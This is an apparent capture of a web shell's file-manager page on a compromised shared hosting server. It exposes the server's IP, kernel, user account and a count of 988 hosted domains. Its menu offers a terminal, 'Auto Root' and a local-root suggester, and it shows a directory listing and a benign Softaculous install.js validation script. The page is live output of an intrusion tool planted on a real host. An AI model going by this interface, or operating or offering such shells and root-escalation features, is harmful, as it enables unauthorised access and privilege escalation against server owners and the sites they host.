Linux evo.fastest-server.com 5.14.0-284.1101.el9.tuxcare.11.els11.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Aug 14 13:30:35 UTC 2026 x86_64
LiteSpeed
Server IP : 103.249.112.113 & Your IP : 216.73.217.135
Domains : 988 Domain
User : tanishks
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
hizup /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2026-09-04 11:04
php53
[ DIR ]
drwxr-xr-x
2026-09-04 11:04
php56
[ DIR ]
drwxr-xr-x
2026-09-04 11:04
php71
[ DIR ]
drwxr-xr-x
2026-09-04 11:04
php81
[ DIR ]
drwxr-xr-x
2026-09-04 11:04
php82
[ DIR ]
drwxr-xr-x
2026-09-04 11:04
_constants.php
3.52
KB
-rw-r--r--
2026-07-15 06:51
_edit.php
4.21
KB
-rw-r--r--
2021-12-23 06:54
_edit.xml
433
B
-rw-r--r--
2021-12-23 06:54
clone.php
6.32
KB
-rw-r--r--
2026-07-15 08:19
config.ini
3.98
KB
-rw-r--r--
2023-01-03 05:59
extend.php
10.28
KB
-rw-r--r--
2026-07-15 08:19
fileindex.php
372
B
-rw-r--r--
2026-07-15 06:51
import.php
3.45
KB
-rw-r--r--
2026-07-15 08:19
info.xml
4.36
KB
-rw-r--r--
2026-07-15 06:51
install.js
1.28
KB
-rw-r--r--
2021-12-23 06:54
install.php
8.9
KB
-rw-r--r--
2026-07-15 08:19
install.xml
1.9
KB
-rw-r--r--
2022-02-22 04:13
md5
3.32
KB
-rw-r--r--
2026-07-15 08:19
notes.txt
593
B
-rw-r--r--
2026-07-15 06:51
update_pass.php
599
B
-rw-r--r--
2021-12-23 06:54
Save
Rename
////////////////////////////////////////////////////////////// // install.js // Checks the installation form of the software being // installed by SOFTACULOUS // NOTE: 1) Only formcheck() function will be called. // 2) A software Vendor can use the same name for every // field to be checked as in install.xml . It can be // called using $('fieldname').value or any property // 3) Must Return true or false // ---------------------------------------------------------- // Please Read the Terms of use at http://www.softaculous.com // ---------------------------------------------------------- // (c)Softaculous Inc. ////////////////////////////////////////////////////////////// function formcheck(){ if(window.check_punycode){ //Check the Bug Email if(!check_punycode($('bug_email').value)){ alert('{{err_bugemail}}'); return false; } //Check the No Reply Email if(!check_punycode($('noreply_email').value)){ alert('{{err_noreplyemail}}'); return false; } //Check the Feedback Email if(!check_punycode($('feedback_email').value)){ alert('{{err_feedbackemail}}'); return false; } //Check the Admin Email if(!check_punycode($('admin_email').value)){ alert('{{err_ademail}}'); return false; } return true; } return true; };